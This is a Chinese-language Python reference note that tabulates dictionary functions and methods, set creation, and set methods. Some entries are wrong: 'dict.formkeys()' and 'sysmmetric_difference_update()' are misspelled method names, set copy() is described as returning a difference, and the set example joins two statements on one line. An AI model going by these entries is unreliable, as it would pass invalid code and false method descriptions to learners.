python字典包含以下内置函数

函数	描述
len()	计算元素个数
str()	输出字典
type()	返回输入的变量类型，如果变量是字典，就返回字典类型

python字典包含以下内置方法

方法	描述
dict.clear()	删除字典内所有元素
dict.copy()	返回一个字典的浅复制
dict.formkeys()	创建一个新的字典，以序列seq中元素做字典的键，val为字典所有键对应的初始值
dict.get(key, default=None)	返回执行键的值，如果键不在字典中返回default 设置的默认值
key in dict	如果键在字典返回true，否返回false
dict.items()	以列表返回一个试图对象
dict.keys()	返回一个试图对象
dict.setdefault(key,dafault=None)	和get()类似，但如果键不在字典中，将回添加键并将值设为default
dict.update(dict2)	把字典dict2的键值对更新到dict中
dict.values()	返回一个试图对象
dict.pop(key)	删除字典key所对应的值，并返回被删除的值
dict.popitem()	返回并删除字典中最后一对键和值

集合（Set）

集合是一个无序的不重复的元素序列
集合中的元素不会重复，并且可以进行交集，并集，差集等常见的集合操作
可以使用花括号{}创建集合，元素之间用逗号，分隔，或者也可以使用set()函数创建

eg：

set1 = {1,2,3,4}set2 = set([5,6,7])

注意：创建空集合时必须用set()函数，因为 {} 用来创建一个空字典

集合内置方法整合表

方法	描述
add()	为集合添加元素
clear()	移除集合中的所有元素
copy()	拷贝多个集合的差集
difference()	返回多个集合的差集
difference_update()	移除集合中的元素，该元素在指定的集合中也存在
discard()	删除集合中指定的元素
intersection()	返回集合的交集
intersection_update()	返回集合的交集
isdisjoint()	判断两个集合是否包含相同的元素，如果没有返回 True，否则返回False
issubset()	判断指定集合是否为该方法参数集合的子集
issuperset()	判断该方法的参数集合是否为指定集合的子集
pop()	随机移除元素
remove()	移除指定元素
symmetric_difference()	返回两个集合中不重复的元素集合
sysmmetric_difference_update()	移除当前集合中在另外一个指定集合中相同的元素，并将另外一个指定集合中不同的元素插入到当前集合中
union()	返回两个集合的并集
update()	给集合添加元素
len()	计算集合元素的个数